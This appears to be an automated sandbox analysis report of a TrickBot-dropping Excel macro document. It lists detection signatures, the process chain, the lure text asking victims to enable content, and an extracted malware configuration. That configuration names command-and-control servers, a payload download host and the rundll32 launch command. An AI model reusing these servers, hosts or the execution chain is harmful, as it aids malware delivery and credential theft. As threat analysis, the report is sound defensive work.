Play interactive tour

Edit tour

Analysis Report c527325d_by_Libranalysis

Overview

General Information

Sample Name:	c527325d_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:	412517
MD5:	c527325d4d0b51734637b5344a3df760
SHA1:	f71b0baa85537ec1709701f39e8e9fd95f9b3d62
SHA256:	468cd4b5d89425cd29bb028696804ed339eb2c0c37b010b62442fbb5a8f778ba
Tags:	SilentBuilder
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Trickbot

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2340 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2312 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)

wermgr.exe (PID: 260 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)

cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
c527325d_by_Libranalysis.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x1675d:$e1: Enable Editing 0x16495:$e3: Enable editing 0x16572:$e4: Enable content

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security
00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security
00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security
00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.1c052e.0.raw.unpack	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security
4.2.rundll32.exe.290000.2.unpack	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security
4.2.rundll32.exe.1c052e.0.unpack	JoeSecurity_TrickBot_4	Yara detected Trickbot	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\hsdksksk.iem,StartW, CommandLine: rundll32 ..\hsdksksk.iem,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1288, ProcessCommandLine: rundll32 ..\hsdksksk.iem,StartW, ProcessId: 2340

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp

Malware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmons[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: global traffic

DNS query: name: koneckotechnology.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.54.114.131:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.54.114.131:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 12 May 2021 16:42:55 GMTserver: Apachelast-modified: Wed, 12 May 2021 13:22:52 GMTaccept-ranges: bytescontent-length: 643072content-type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

IP Address: 198.54.114.131 198.54.114.131

Source: global traffic

HTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6DEB57B.emf

Jump to behavior

Source: global traffic

Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: koneckotechnology.com

Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 4	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 8	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 8	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 12	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 12	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 16	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 16	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 20	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 20	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 24	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 24	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 28	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 28	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 32	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 32	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 36	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 36	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 40	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 40	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 44	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 44	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 48	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 48	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 52	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 52	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 56	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 56	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 60	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 60	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 64	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 64	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 68	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 68	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 72	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 72	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 76	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 76	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 80	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 80	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 84	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 84	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 88	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 88	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 92	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 92	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 96	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 96	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 100	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 100	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 104	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 104	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 108	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 108	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 112	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 112	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 116	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 116	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 120	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 120	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 124	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 124	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 128	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 128	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 132	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 132	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 136	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 136	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 140	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 140	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: c527325d_by_Libranalysis.xls

Initial sample: EXEC

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: c527325d_by_Libranalysis.xls

OLE indicator, VBA macros: true

Source: c527325d_by_Libranalysis.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@7/7@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF4F.tmp

Jump to behavior

Source: c527325d_by_Libranalysis.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_00221030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00325950 push dword ptr [edx+14h]; ret

4_2_00325A5D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
